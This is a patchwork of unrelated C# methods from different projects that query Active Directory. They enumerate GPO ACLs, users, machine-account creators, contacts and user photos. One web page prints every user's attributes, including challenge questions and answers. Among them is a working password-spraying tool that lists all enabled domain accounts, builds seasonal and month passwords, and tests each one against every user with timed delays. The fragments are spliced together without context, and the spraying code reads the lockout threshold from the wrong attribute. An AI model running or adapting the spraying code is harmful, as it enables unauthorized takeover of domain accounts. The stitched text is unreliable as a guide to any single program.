to catch duplicate UIDs caused by Default Domain Policy and Domain Controller Policy having 'well known guids' if (gposData[gpoUid] != null) { Utility.DebugWrite("\nI think you're in a multi-domain environment cos I just saw two GPOs with the same GUID. You should be careful not to miss stuff in the Default Domain Policy and Default Domain Controller Policy."); continue; } gpoData.Add("UID", gpoUid); string gpoDn = gpoDe.Properties["distinguishedName"].Value.ToString(); gpoData.Add("Distinguished Name", gpoDn); string gpoCreated = gpoDe.Properties["whenCreated"].Value.ToString(); gpoData.Add("Created", gpoCreated); // 3= all disabled // 2= computer configuration settings disabled // 1= user policy disabled // 0 = all enabled string gpoFlags = gpoDe.Properties["flags"].Value.ToString(); string gpoEnabledStatus = ""; switch (gpoFlags) { case "0": gpoEnabledStatus = "Enabled"; break; case "1": gpoEnabledStatus = "User Policy Disabled"; break; case "2": gpoEnabledStatus = "Computer Policy Disabled"; break; case "3": gpoEnabledStatus = "Disabled"; break; default: gpoEnabledStatus = "Couldn't process GPO Enabled Status. Weird."; break; } gpoData.Add("GPO Status", gpoEnabledStatus); // get the acl ActiveDirectorySecurity gpoAcl = gpoDe.ObjectSecurity; // // Get the owner in a really dumb way // string gpoSddl = gpoAcl.GetSecurityDescriptorSddlForm(AccessControlSections.Owner); // JObject parsedOwner = ParseSDDL.ParseSddlString(gpoSddl, SecurableObjectType.DirectoryServiceObject); // string gpoOwner = parsedOwner["Owner"].ToString(); // gpoData.Add("Owner", gpoOwner); // make a JObject to put the stuff in JObject gpoAclJObject = new JObject(); AccessControlSections sections = AccessControlSections.All; string sddlString = gpoAcl.GetSecurityDescriptorSddlForm(sections); JObject parsedSDDL = ParseSddl.ParseSddlString(sddlString, SecurableObjectType.DirectoryServiceObject); foreach (KeyValuePair <string, JToken> thing in parsedSDDL) { if (thing.Key == "Owner") { gpoAclJObject.Add("Owner", thing.Value.ToString()); continue; } if (thing.Key == "Group") { gpoAclJObject.Add("Group", thing.Value); continue; } if (thing.Key == "DACL") { foreach (JProperty ace in thing.Value.Children()) { int aceInterestLevel = 1; bool interestingRightPresent = false; if (ace.Value["Rights"] != null) { string[] intRightsArray0 = new string[] { "WRITE_OWNER", "CREATE_CHILD", "WRITE_PROPERTY", "WRITE_DAC", "SELF_WRITE", "CONTROL_ACCESS" }; foreach (string right in intRightsArray0) { if (ace.Value["Rights"].Contains(right)) { interestingRightPresent = true; } } } string trusteeSid = ace.Value["SID"].ToString(); string[] boringSidEndings = new string[] { "-3-0", "-5-9", "5-18", "-512", "-519", "SY", "BA", "DA", "CO", "ED", "PA", "CG", "DD", "EA", "LA", }; string[] interestingSidEndings = new string[] { "DU", "WD", "IU", "BU", "AN", "AU", "BG", "DC", "DG", "LG" }; bool boringUserPresent = false; foreach (string boringSidEnding in boringSidEndings) { if (trusteeSid.EndsWith(boringSidEnding)) { boringUserPresent = true; break; } } bool interestingUserPresent = false; foreach (string interestingSidEnding in interestingSidEndings) { if (trusteeSid.EndsWith(interestingSidEnding)) { interestingUserPresent = true; break; } } if (interestingUserPresent && interestingRightPresent) { aceInterestLevel = 10; } else if (boringUserPresent) { aceInterestLevel = 0; } if (aceInterestLevel >= GlobalVar.IntLevelToShow) { // pass the whole thing on gpoAclJObject.Add(ace); } } } } //add the JObject to our blob of data about the gpo if (gpoAclJObject.HasValues) { gpoData.Add("ACLs", gpoAclJObject); } gposData.Add(gpoUid, gpoData); } return(gposData); } catch (Exception exception) { Utility.DebugWrite(exception.ToString()); Console.ReadKey(); Environment.Exit(1); } return(null); }
/// <summary> /// Gets all users of a given domain. /// </summary> /// <param name="domain">Domain to query. Should be given in the form ldap://domain.com/ </param> /// <returns>A list of users.</returns> public static List <ADUser> GetUsers(string domain, string username, string password) { List <ADUser> users = new List <ADUser>(); if (username.Any()) { using (DirectoryEntry searchRoot = new DirectoryEntry(domain, username, password)) using (DirectorySearcher directorySearcher = new DirectorySearcher(searchRoot)) { // Set the filter directorySearcher.Filter = "(&(objectCategory=person)(objectClass=user))"; // Set the properties to load. directorySearcher.PropertiesToLoad.Add(CanonicalNameProperty); directorySearcher.PropertiesToLoad.Add(SamAccountNameProperty); directorySearcher.PropertiesToLoad.Add(LastLoginProperty); directorySearcher.PropertiesToLoad.Add(PwdLastSetProperty); directorySearcher.PropertiesToLoad.Add(DescriptionProperty); directorySearcher.PropertiesToLoad.Add(UserAccountControlProperty); try { using (SearchResultCollection searchResultCollection = directorySearcher.FindAll()) { foreach (SearchResult searchResult in searchResultCollection) { // Create new ADUser instance var user = new ADUser(); // Set CN if available. if (searchResult.Properties[CanonicalNameProperty].Count > 0) { user.CN = searchResult.Properties[CanonicalNameProperty][0].ToString(); } // Set sAMAccountName if available if (searchResult.Properties[SamAccountNameProperty].Count > 0) { user.SamAcountName = searchResult.Properties[SamAccountNameProperty][0].ToString(); } // Description if (searchResult.Properties[DescriptionProperty].Count > 0) { user.Description = searchResult.Properties[DescriptionProperty][0].ToString(); if (user.Description.Length >= 65) { user.Description = user.Description.Substring(0, 60) + "..."; } } // Last Login if (searchResult.Properties[LastLoginProperty].Count > 0) { user.LastLogin = (long)searchResult.Properties[LastLoginProperty][0]; } // Password Last Set if (searchResult.Properties[PwdLastSetProperty].Count > 0) { user.PwdLastSet = (long)searchResult.Properties[PwdLastSetProperty][0]; } // Password Last Set if (searchResult.Properties[UserAccountControlProperty].Count > 0) { /* * sEnabled = 'Enabled' * s512 = 'Enabled Account' * s514 = 'Disabled Account' * s544 = 'Enabled, Password Not Required' * s546 = 'Disabled, Password Not Required' * s66048 = 'Account Enabled, Password Doesn\'t Expire' * s66050 = 'Disabled, Password Doesn\'t Expire' * s66080 = 'Enabled, Password Doesn\'t Expire & Not Required' * s66082 = 'Disabled, Password Doesn\'t Expire & Not Required' * s262656 = 'Enabled, Smartcard Required' * s262658 = 'Disabled, Smartcard Required' * s262688 = 'Enabled, Smartcard Required, Password Not Required' * s262690 = 'Disabled, Smartcard Required, Password Not Required' * s328192 = 'Enabled, Smartcard Required, Password Doesn\'t Expire' * s328194 = 'Disabled, Smartcard Required, Password Doesn\'t Expire' * s328224 = 'Enabled, Smartcard Required, Password Doesn\'t Expire & Not Required' * s328226 = 'Disabled, Smartcard Required, Password Doesn\'t Expire & Not Required' * sDisabled = 'Disabled' * */ string UacTemp = searchResult.Properties[UserAccountControlProperty][0].ToString(); switch (UacTemp) { case "Enabled": user.UserAccountControl = "Enabled"; break; case "Disabled": user.UserAccountControl = "Disabled"; break; case "512": user.UserAccountControl = "Enabled"; break; case "514": user.UserAccountControl = "Disabled"; break; case "544": user.UserAccountControl = "Enabled"; break; case "546": user.UserAccountControl = "Disabled"; break; case "66048": user.UserAccountControl = "Enabled"; break; case "66050": user.UserAccountControl = "Disabled"; break; case "66080": user.UserAccountControl = "Enabled"; break; case "66082": user.UserAccountControl = "Disabled"; break; case "262656": user.UserAccountControl = "Enabled"; break; case "262658": user.UserAccountControl = "Disabled"; break; case "262688": user.UserAccountControl = "Enabled"; break; case "262690": user.UserAccountControl = "Disabled"; break; case "328192": user.UserAccountControl = "Enabled"; break; case "328194": user.UserAccountControl = "Disabled"; break; case "328224": user.UserAccountControl = "Enabled"; break; case "328226": user.UserAccountControl = "Disabled"; break; case "131072": user.UserAccountControl = "Enabled"; break; case "262144": user.UserAccountControl = "Enabled"; break; default: user.UserAccountControl = "Enabled"; break; } } // Add user to users list. users.Add(user); } } } catch (Exception e) { MessageBox.Show(e.Message, "Error: Cannot Retrieve User Information"); } } } else { using (DirectoryEntry searchRoot = new DirectoryEntry(domain)) using (DirectorySearcher directorySearcher = new DirectorySearcher(searchRoot)) { // Set the filter directorySearcher.Filter = "(&(objectCategory=person)(objectClass=user))"; // Set the properties to load. directorySearcher.PropertiesToLoad.Add(CanonicalNameProperty); directorySearcher.PropertiesToLoad.Add(SamAccountNameProperty); directorySearcher.PropertiesToLoad.Add(LastLoginProperty); directorySearcher.PropertiesToLoad.Add(PwdLastSetProperty); directorySearcher.PropertiesToLoad.Add(DescriptionProperty); directorySearcher.PropertiesToLoad.Add(UserAccountControlProperty); try { using (SearchResultCollection searchResultCollection = directorySearcher.FindAll()) { foreach (SearchResult searchResult in searchResultCollection) { // Create new ADUser instance var user = new ADUser(); // Set CN if available. if (searchResult.Properties[CanonicalNameProperty].Count > 0) { user.CN = searchResult.Properties[CanonicalNameProperty][0].ToString(); } // Set sAMAccountName if available if (searchResult.Properties[SamAccountNameProperty].Count > 0) { user.SamAcountName = searchResult.Properties[SamAccountNameProperty][0].ToString(); } // Description if (searchResult.Properties[DescriptionProperty].Count > 0) { user.Description = searchResult.Properties[DescriptionProperty][0].ToString(); } // Last Login if (searchResult.Properties[LastLoginProperty].Count > 0) { user.LastLogin = (long)searchResult.Properties[LastLoginProperty][0]; } // Password Last Set if (searchResult.Properties[PwdLastSetProperty].Count > 0) { user.PwdLastSet = (long)searchResult.Properties[PwdLastSetProperty][0]; } // Password Last Set if (searchResult.Properties[UserAccountControlProperty].Count > 0) { /* * sEnabled = 'Enabled' * s512 = 'Enabled Account' * s514 = 'Disabled Account' * s544 = 'Enabled, Password Not Required' * s546 = 'Disabled, Password Not Required' * s66048 = 'Account Enabled, Password Doesn\'t Expire' * s66050 = 'Disabled, Password Doesn\'t Expire' * s66080 = 'Enabled, Password Doesn\'t Expire & Not Required' * s66082 = 'Disabled, Password Doesn\'t Expire & Not Required' * s262656 = 'Enabled, Smartcard Required' * s262658 = 'Disabled, Smartcard Required' * s262688 = 'Enabled, Smartcard Required, Password Not Required' * s262690 = 'Disabled, Smartcard Required, Password Not Required' * s328192 = 'Enabled, Smartcard Required, Password Doesn\'t Expire' * s328194 = 'Disabled, Smartcard Required, Password Doesn\'t Expire' * s328224 = 'Enabled, Smartcard Required, Password Doesn\'t Expire & Not Required' * s328226 = 'Disabled, Smartcard Required, Password Doesn\'t Expire & Not Required' * sDisabled = 'Disabled' * */ string UacTemp = searchResult.Properties[UserAccountControlProperty][0].ToString(); switch (UacTemp) { case "Enabled": user.UserAccountControl = "Enabled"; break; case "Disabled": user.UserAccountControl = "Disabled"; break; case "512": user.UserAccountControl = "Enabled"; break; case "514": user.UserAccountControl = "Disabled"; break; case "544": user.UserAccountControl = "Enabled"; break; case "546": user.UserAccountControl = "Disabled"; break; case "66048": user.UserAccountControl = "Enabled"; break; case "66050": user.UserAccountControl = "Disabled"; break; case "66080": user.UserAccountControl = "Enabled"; break; case "66082": user.UserAccountControl = "Disabled"; break; case "262656": user.UserAccountControl = "Enabled"; break; case "262658": user.UserAccountControl = "Disabled"; break; case "262688": user.UserAccountControl = "Enabled"; break; case "262690": user.UserAccountControl = "Disabled"; break; case "328192": user.UserAccountControl = "Enabled"; break; case "328194": user.UserAccountControl = "Disabled"; break; case "328224": user.UserAccountControl = "Enabled"; break; case "328226": user.UserAccountControl = "Disabled"; break; default: user.UserAccountControl = "Enabled"; break; } } // Add user to users list. users.Add(user); } } } catch (Exception e) { MessageBox.Show(e.Message, "Error: Cannot Retrieve User Information"); } } } // Return all found users. return(users); }
static void Main(string[] args) { string LogonServer = Environment.GetEnvironmentVariable("LOGONSERVER").TrimStart('\\'); if (LogonServer == null) { Console.WriteLine("[-] Failed to retrieve the LOGONSERVER the environment variable; the script will exit."); return; } List <string> UserList = new List <string>(); int minPwdLength = new int(); int lockoutThreshold = new int(); string Seeds = null; string Passwords = null; int Delay = new int(); int Sleep = new int(); for (int i = 0; i < args.Length; i++) { if (args[i] == "--Passwords") { Passwords = args[i + 1]; } else if (args[i] == "--Seeds") { Seeds = args[i + 1]; } else if (args[i] == "--Delay") { Delay = int.Parse(args[i + 1]); } else if (args[i] == "--Sleep") { Sleep = int.Parse(args[i + 1]); } } try { DirectoryEntry dEntry = new DirectoryEntry("LDAP://" + System.DirectoryServices.ActiveDirectory.ActiveDirectorySite.GetComputerSite().InterSiteTopologyGenerator.Name); DirectorySearcher dSearch = new DirectorySearcher(dEntry); dSearch.Filter = "(&(objectCategory=Person)(sAMAccountName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; dSearch.PageSize = 1000; dSearch.PropertiesToLoad.Add("sAMAccountName"); dSearch.SearchScope = SearchScope.Subtree; SearchResultCollection results = dSearch.FindAll(); if (results != null) { for (var i = 0; i < results.Count; i++) { UserList.Add((string)results[i].Properties["sAMAccountName"][0]); } } else { Console.WriteLine("[-] Failed to retrieve the usernames from Active Directory; the script will exit."); return; } if (UserList != null) { int UserCount = UserList.Count; Console.WriteLine("[+] Successfully collected " + UserCount + " usernames from Active Directory."); lockoutThreshold = (int)dEntry.Properties["minPwdLength"].Value; Console.WriteLine("[*] The Lockout Threshold for the current domain is " + lockoutThreshold + "."); minPwdLength = (int)dEntry.Properties["minPwdLength"].Value; Console.WriteLine("[*] The Min Password Length for the current domain is " + minPwdLength + "."); } else { Console.WriteLine("[-] Failed to create a list the usernames from Active Directory; the script will exit."); return; } } catch { Console.WriteLine("[-] Failed to find or connect to Active Directory; the script will exit."); return; } List <string> SeedList = new List <string>(); List <string> PasswordList = new List <string>(); if (Passwords != null) { PasswordList = Passwords.Split(',').ToList(); } else if (Seeds != null) { SeedList = Seeds.Split(',').ToList(); PasswordList = GeneratePasswords(SeedList, minPwdLength); } else { List <string> SeasonList = new List <string>(); List <string> MonthList = new List <string>(); System.DateTime Today = System.DateTime.Today; System.DateTime Month = new DateTime(Today.Year, Today.Month, 1); SeasonList.Add(GetSeason(Month.AddMonths(-1)).ToString()); SeasonList.Add(GetSeason(Month).ToString()); SeasonList.Add(GetSeason(Month.AddMonths(1)).ToString()); MonthList.Add(Month.AddMonths(-1).ToString("MMMM")); MonthList.Add(Month.ToString("MMMM")); MonthList.Add(Month.AddMonths(1).ToString("MMMM")); SeedList = SeasonList.Distinct().Concat(MonthList.Distinct()).ToList(); PasswordList = GeneratePasswords(SeedList, minPwdLength); } if (PasswordList == null) { Console.WriteLine("[-] The PasswordList variable is empty; the script will exit."); return; } Console.WriteLine("[+] Successfully generated a list of " + PasswordList.Count + " passwords."); Console.WriteLine("[*] Starting password spraying operations."); if (Delay > 0) { Console.WriteLine("[*] Using a delay of " + Delay + " milliseonds between attempts."); } else { Console.WriteLine("[*] Using the default delay of 1000 milliseonds between attempts."); } foreach (string Password in PasswordList) { Console.WriteLine("[*] Using password " + Password); foreach (string UserName in UserList) { bool Flag = false; try { using (PrincipalContext principalContext = new PrincipalContext(ContextType.Domain, LogonServer)) { Flag = principalContext.ValidateCredentials(UserName, Password, ContextOptions.Negotiate); } } catch (PrincipalServerDownException) { Console.WriteLine("[-] Failed to retrieve the domain name; the script will exit."); } if (Flag == true) { Console.WriteLine("[+] Successfully authenticated with " + UserName + "::" + Password); } else { //Console.WriteLine("[-] Authentication failed with " + UserName + "::" + Password); } if (Delay > 0) { Thread.Sleep(Delay); } else { Thread.Sleep(1000); } } Console.WriteLine("[*] Completed all rounds with password " + Password); if (Sleep > 0) { int Duration = (int)TimeSpan.FromMinutes(Sleep).TotalMilliseconds; Console.WriteLine("[*] Now the script will sleep for " + TimeSpan.FromMilliseconds(Duration).TotalMinutes.ToString() + " minutes."); Thread.Sleep(Duration); } } Console.WriteLine("[*] Completed all password spraying operations."); }
//Usuario desde AD #region AD /// <summary> /// /// </summary> /// <param name="dominio"></param> /// <param name="tipoFiltro"></param> /// <param name="criterio"></param> /// <returns></returns> public List <CuentaUsuario> getUsuarioDeDirectorioActivo(string dominio, string tipoFiltro, string criterio) { string rutaDominio; List <CuentaUsuario> listaUsuario = new List <CuentaUsuario>(); rutaDominio = this.getRutaDominio(dominio); DirectoryEntry oDirectorioEntrada = new DirectoryEntry(rutaDominio); string filtroDirectorio = getLDAPFilter(tipoFiltro, criterio); DirectorySearcher oBuscaDirectorio = new DirectorySearcher(oDirectorioEntrada, filtroDirectorio); oBuscaDirectorio.PageSize = 10; oBuscaDirectorio.PropertiesToLoad.Add("givenName"); oBuscaDirectorio.PropertiesToLoad.Add("samaccountname"); oBuscaDirectorio.PropertiesToLoad.Add("mail"); oBuscaDirectorio.PropertiesToLoad.Add("company"); oBuscaDirectorio.PropertiesToLoad.Add("title"); oBuscaDirectorio.PropertiesToLoad.Add("sn"); oBuscaDirectorio.PropertiesToLoad.Add("mobile"); oBuscaDirectorio.PropertiesToLoad.Add("telephoneNumber"); oBuscaDirectorio.PropertiesToLoad.Add("c"); oBuscaDirectorio.PropertiesToLoad.Add("physicalDeliveryOfficeName"); oBuscaDirectorio.PropertiesToLoad.Add("department"); oBuscaDirectorio.PropertiesToLoad.Add("userPassword"); oBuscaDirectorio.PropertiesToLoad.Add("postalCode"); CuentaUsuario oCuentaUsuario; SearchResultCollection Data = oBuscaDirectorio.FindAll(); foreach (SearchResult oResultado in Data) { oCuentaUsuario = new CuentaUsuario(); if (oResultado.Properties["givenName"].Count > 0) { oCuentaUsuario.Nombre = (string)oResultado.Properties["givenName"][0]; } if (oResultado.Properties["samaccountname"].Count > 0) { oCuentaUsuario.Alias = (string)oResultado.Properties["samaccountname"][0]; } if (oResultado.Properties["mail"].Count > 0) { oCuentaUsuario.CorreoElectronico = (string)oResultado.Properties["mail"][0]; } if (oResultado.Properties["company"].Count > 0) { oCuentaUsuario.Organizacion = (string)oResultado.Properties["company"][0]; } if (oResultado.Properties["title"].Count > 0) { oCuentaUsuario.Cargo = (string)oResultado.Properties["title"][0]; } if (oResultado.Properties["sn"].Count > 0) { oCuentaUsuario.ApellidoPaterno = (string)oResultado.Properties["sn"][0]; string[] apellidos = oCuentaUsuario.ApellidoPaterno.Split(' '); if (apellidos.Length > 1) { oCuentaUsuario.ApellidoPaterno = apellidos[0]; oCuentaUsuario.ApellidoMaterno = apellidos[1]; } } if (oResultado.Properties["mobile"].Count > 0) { oCuentaUsuario.TelefonoMovil = (string)oResultado.Properties["mobile"][0]; } if (oResultado.Properties["telephoneNumber"].Count > 0) { oCuentaUsuario.TelefonoTrabajo = (string)oResultado.Properties["telephoneNumber"][0]; } if (oResultado.Properties["c"].Count > 0) { oCuentaUsuario.Pais = (string)oResultado.Properties["c"][0]; } if (oResultado.Properties["userPassword"].Count > 0) { oCuentaUsuario.Clave = (string)oResultado.Properties["userPassword"][0]; } if (oResultado.Properties["physicalDeliveryOfficeName"].Count > 0) { oCuentaUsuario.Ubigeo = (string)oResultado.Properties["physicalDeliveryOfficeName"][0]; } if (oResultado.Properties["department"].Count > 0) { oCuentaUsuario.Area = (string)oResultado.Properties["department"][0]; } if (oResultado.Properties["postalCode"].Count > 0) { oCuentaUsuario.NumeroDocumento = (string)oResultado.Properties["postalCode"][0]; } oCuentaUsuario.Dominio = dominio; listaUsuario.Add(oCuentaUsuario); } return(listaUsuario); }
private static Task <List <UserEntry> > GetUsersAsync(bool force = false) { if (!SettingsService.Instance.Sync.SyncUsers) { throw new ApplicationException("Not configured to sync users."); } if (SettingsService.Instance.Server?.Ldap == null) { throw new ApplicationException("No configuration for directory server."); } if (SettingsService.Instance.Sync == null) { throw new ApplicationException("No configuration for sync."); } if (!AuthService.Instance.Authenticated) { throw new ApplicationException("Not authenticated."); } var userEntry = SettingsService.Instance.Server.Ldap.GetUserDirectoryEntry(); var filter = BuildBaseFilter(SettingsService.Instance.Sync.Ldap.UserObjectClass, SettingsService.Instance.Sync.UserFilter); filter = BuildRevisionFilter(filter, force, SettingsService.Instance.LastUserSyncDate); Console.WriteLine("User search: {0} => {1}", userEntry.Path, filter); var searcher = new DirectorySearcher(userEntry, filter); var result = searcher.FindAll(); var users = new List <UserEntry>(); foreach (SearchResult item in result) { var user = BuildUser(item, false); if (user == null) { continue; } users.Add(user); } // Deleted users if (SettingsService.Instance.Server.Type == DirectoryType.ActiveDirectory) { var deletedEntry = SettingsService.Instance.Server.Ldap.GetBasePathDirectoryEntry(); var deletedFilter = BuildBaseFilter(SettingsService.Instance.Sync.Ldap.UserObjectClass, "(isDeleted=TRUE)"); deletedFilter = BuildRevisionFilter(deletedFilter, force, SettingsService.Instance.LastUserSyncDate); var deletedSearcher = new DirectorySearcher(deletedEntry, deletedFilter); deletedSearcher.Tombstone = true; var deletedResult = deletedSearcher.FindAll(); foreach (SearchResult item in deletedResult) { var user = BuildUser(item, true); if (user == null) { continue; } users.Add(user); } } return(Task.FromResult(users)); }
public static void GetMachineAccountCreator(string container, string distinguishedName, string domain, string domainController, bool verbose, NetworkCredential credential) { distinguishedName = GetMAQDistinguishedName(null, container, distinguishedName, domain, verbose); DirectoryEntry directoryEntry; if (!String.IsNullOrEmpty(credential.UserName)) { directoryEntry = new DirectoryEntry(String.Concat("LDAP://", domainController, "/", distinguishedName), credential.UserName, credential.Password); } else { directoryEntry = new DirectoryEntry(String.Concat("LDAP://", domainController, "/", distinguishedName)); } try { DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry); directorySearcher.SearchRoot = directoryEntry; directorySearcher.PageSize = 1000; directorySearcher.Filter = "(&(ms-ds-creatorsid=*))"; directorySearcher.SearchScope = System.DirectoryServices.SearchScope.Subtree; SearchResultCollection searchResults = directorySearcher.FindAll(); if (searchResults.Count == 0) { Console.WriteLine("[-] No results found in {0}", distinguishedName); } foreach (SearchResult searchResult in searchResults) { byte[] creatorSIDObject = (byte[])searchResult.Properties["ms-ds-creatorsid"][0]; string creatorSID = new SecurityIdentifier(creatorSIDObject, 0).Value; string machineAccount = (string)searchResult.Properties["Name"][0]; string accountContainer = (string)searchResult.Properties["distinguishedName"][0]; accountContainer = accountContainer.Split(',')[1]; string principle = ""; string principalDistingushedName = ""; try { DirectoryEntry directoryEntryPrinciple; if (!String.IsNullOrEmpty(credential.UserName)) { directoryEntryPrinciple = new DirectoryEntry(String.Concat("LDAP://", domainController, "/<SID=", creatorSID, ">"), credential.UserName, credential.Password); } else { directoryEntryPrinciple = new DirectoryEntry(String.Concat("LDAP://", domainController, "/<SID=", creatorSID, ">")); } if (directoryEntryPrinciple.Properties["userPrincipalname"].Value != null) { principle = directoryEntryPrinciple.Properties["userPrincipalname"].Value.ToString(); } else { principle = directoryEntryPrinciple.Properties["sAMAccountName"].Value.ToString(); principalDistingushedName = directoryEntryPrinciple.Properties["distinguishedName"].Value.ToString(); } directoryEntryPrinciple.Dispose(); } catch { principle = creatorSID; } Console.WriteLine("[+] Account {0} is the creator of {1} in {2}", principle, machineAccount, accountContainer); } } catch (Exception ex) { Console.WriteLine(ex.ToString()); throw; } if (!String.IsNullOrEmpty(directoryEntry.Path)) { directoryEntry.Dispose(); } }
protected void Page_Load(object sender, EventArgs e) { if (Request["testing"] == "true") return; //WeavverLib.JBilling.createUser cu = new WeavverLib.JBilling.createUser(); //WeavverLib.JBilling.getUserId gui; // create the interface instance of the class. //WebServicesSessionSpringBeanService service = new WebServicesSessionSpringBeanService(); //int xx; //bool ret; //service.Credentials = new System.Net.NetworkCredential("mythicalbox", ""); //service.getUserId("mythicalbox", out xx, out ret); //itemDTOEx[] items = service.getAllItems(); //userWS ws = new userWS(); ////ws.creditCard = new creditCardDTO(); ////ws.creditLimit = 0; ////ws.creditLimitSpecified = true; //ws.statusId = 1; // active //ws.statusIdSpecified = true; //ws.userName = "******"; //ws.languageId = 1; //ws.userIdBlacklisted = false; //ws.userIdBlacklistedSpecified = false; //ws.languageIdSpecified = true; //ws.role = "user"; //ws.mainRoleId = 5; // customer //ws.contact = new contactWS(); //ws.contact.address1 = "531 N. Mountain View Pl."; //ws.contact.city = "Fullerton"; //ws.contact.email = "*****@*****.**"; //ws.contact.firstName = "John"; //ws.contact.lastName = "Doe"; //ws.mainRoleIdSpecified = true; //ws.currencyId = 1; //ws.currencyIdSpecified = true; //ws.createDatetime = DateTime.UtcNow; //ws.createDatetimeSpecified = true; //int xy; //bool rx; //service.createUser(ws, out xy, out rx); //foreach (itemDTOEx idto in items) //{ // Response.Write(idto.description); //} //if (xx > 0) { // //WebServicesSessionLocalService.userWS userData = service.getUserWS(userId); //} //Response.Write(xx); //WeavverLib.JBilling.userWS us; //Interop.QBFC7.QBSessionManager sm = new QBSessionManager(); //sm.OpenConnection("", "Weavver App"); //sm.BeginSession("", ENOpenMode.omDontCare); DirectoryEntry entry = GetDirectoryEntry(); //Response.Write("<html>"); DirectorySearcher dSearch = new DirectorySearcher(entry); //string username = ""; dSearch.Filter = "(&(objectClass=user))"; // get all entries from the active directory. // Last Name, name, initial, homepostaladdress, title, company etc.. foreach (SearchResult sResultSet in dSearch.FindAll()) { Response.Write(new Guid((byte[])sResultSet.Properties["objectguid"][0]) + "<br />"); Response.Write(GetProperty(sResultSet, "cn")); Response.Write(GetProperty(sResultSet, "cn")); // Login Name Response.Write(GetProperty(sResultSet, "givenName")); // First Name Response.Write(GetProperty(sResultSet, "initials")); // Middle Initials Response.Write(GetProperty(sResultSet, "sn")); // Last Name string tempAddress = GetProperty(sResultSet, "homePostalAddress"); // Address if (tempAddress != string.Empty) { string[] addressArray = tempAddress.Split(';'); string taddr1, taddr2; taddr1 = addressArray[0]; Response.Write(taddr1); taddr2 = addressArray[1]; Response.Write(taddr2); } Response.Write(GetProperty(sResultSet, "title")); // title Response.Write(GetProperty(sResultSet, "company")); // company Response.Write(GetProperty(sResultSet, "st")); // state Response.Write(GetProperty(sResultSet, "l")); // city Response.Write(GetProperty(sResultSet, "co")); // country Response.Write(GetProperty(sResultSet, "postalCode")); // postal code Response.Write("telephone number: " + GetProperty(sResultSet, "telephoneNumber")); // telephonenumber Response.Write(GetProperty(sResultSet, "otherTelephone")); // extension Response.Write(GetProperty(sResultSet, "facsimileTelephoneNumber")); // fax Response.Write(GetProperty(sResultSet, "mail")); // email address Response.Write(GetProperty(sResultSet, "extensionAttribute1")); // Challenge Question Response.Write(GetProperty(sResultSet, "extensionAttribute2")); // Challenge Response Response.Write(GetProperty(sResultSet, "extensionAttribute3")); // Member Company Response.Write(GetProperty(sResultSet, "extensionAttribute4")); // Company Relation ship Exits Response.Write(GetProperty(sResultSet, "extensionAttribute5")); //status Response.Write(GetProperty(sResultSet, "extensionAttribute6")); // Assigned Sales Person Response.Write(GetProperty(sResultSet, "extensionAttribute7")); // Accept T and C Response.Write(GetProperty(sResultSet, "extensionAttribute8")); // jobs String tEmail = GetProperty(sResultSet, "extensionAttribute9"); // email over night if (tEmail != string.Empty) { string em1, em2, em3; string[] emailArray = tEmail.Split(';'); em1 = emailArray[0]; em2 = emailArray[1]; em3 = emailArray[2]; Console.Write(em1 + em2 + em3); } Response.Write(GetProperty(sResultSet, "extensionAttribute10")); // email daily emerging market Response.Write(GetProperty(sResultSet, "extensionAttribute11")); // email daily corporate market Response.Write(GetProperty(sResultSet, "extensionAttribute12")); // AssetMgt Range Response.Write(GetProperty(sResultSet, "whenCreated")); // date of account created Response.Write(GetProperty(sResultSet, "whenChanged")); // date of account Response.Write("<hr />"); } }
public static void clr_GetADusersPhotos(SqlString ADpath, SqlString ADfilter) { //System.IO.StreamWriter file = Util.CreateLogFile(); SearchResultCollection results = null; Int32 itemcount = 0; try { DataTable tbl = new DataTable(); tbl.Columns.Add("ObjectGUID", typeof(Guid)); tbl.Columns.Add("Width", typeof(int)); tbl.Columns.Add("Height", typeof(int)); tbl.Columns.Add("Format", typeof(string)); tbl.Columns.Add("Photo", typeof(byte[])); DataRow row; DirectoryEntry entry = new DirectoryEntry((string)ADpath); DirectorySearcher searcher = new DirectorySearcher(entry); searcher.Filter = (string)ADfilter; searcher.PageSize = 500; results = searcher.FindAll(); foreach (SearchResult searchResult in results) { itemcount++; DirectoryEntry item = searchResult.GetDirectoryEntry(); PropertyValueCollection prop = Util.GetADproperty(item, "thumbnailphoto"); if (prop == null) continue; // Get image size ImgSize imgsize = new ImgSize(0, 0, "xxx"); try { imgsize = ImageHeader.GetDimensions((byte[])prop[0]); } catch(Exception ex) { SqlContext.Pipe.Send("Warning: Get image size failed for user (" + Util.GetDistinguishedName(item) + ")" + " Exception: " + ex.Message); } row = tbl.NewRow(); row[0] = item.Guid; if (!imgsize.IsEmpty()) // Image size will be NULL unless size has been read from the image header. { row[1] = imgsize.Width; row[2] = imgsize.Height; row[3] = imgsize.Format; } row[4] = prop[0]; tbl.Rows.Add(row); } // Return dataset to SQL server. ReturnDatasetToSqlServer(tbl); } catch (System.Runtime.InteropServices.COMException) { SqlContext.Pipe.Send("COMException in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString()); throw; } catch (InvalidOperationException) { SqlContext.Pipe.Send("InvalidOperationException in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString()); throw; } catch (NotSupportedException) { SqlContext.Pipe.Send("NotSupportedException in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString()); throw; } catch (Exception) { SqlContext.Pipe.Send("Exception in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString()); throw; } finally { if (null != results) { results.Dispose(); // To prevent memory leaks, always call results = null; // SearchResultCollection.Dispose() manually. } } //file.Close(); }
public List<ContactPrincipal> GetChildContactObjects(int maxRecords) { var directoryDe = new DirectoryEntry(); if (ContextType == ContextType.Domain) { directoryDe = new DirectoryEntry(string.Format("LDAP://{0}", ConnectedServer)); } if (ContextType == ContextType.ApplicationDirectory) { directoryDe = new DirectoryEntry(string.Format("LDAP://{0}/{1}", ConnectedServer, Container)); } var search = new DirectorySearcher(directoryDe) { Tombstone = false, Asynchronous = true, PageSize = 100, Filter = "(objectClass=contact)" }; var results = search.FindAll(); var i = 0; var children = new List<ContactPrincipal>(); foreach (SearchResult result in results) { i++; var delims = new[] {'/'}; var pieces = result.Path.Split(delims); var dn = pieces[pieces.Count() - 1]; if (maxRecords > 0 && i > maxRecords) { break; } try { children.Add(ContactPrincipal.FindByIdentity(this, IdentityType.DistinguishedName, dn)); } catch { } } return children; }
